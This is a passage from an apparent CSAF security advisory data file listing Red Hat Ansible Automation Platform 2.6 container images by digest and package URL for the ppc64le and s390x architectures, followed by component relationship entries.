},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3A7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774540248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Aa2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ae43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Ab3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Ad0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Afe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Ac1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Afad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3Ac8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774540248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Afa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3Af00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x as a component of Red Hat Ansible Automation Platform 2.6",
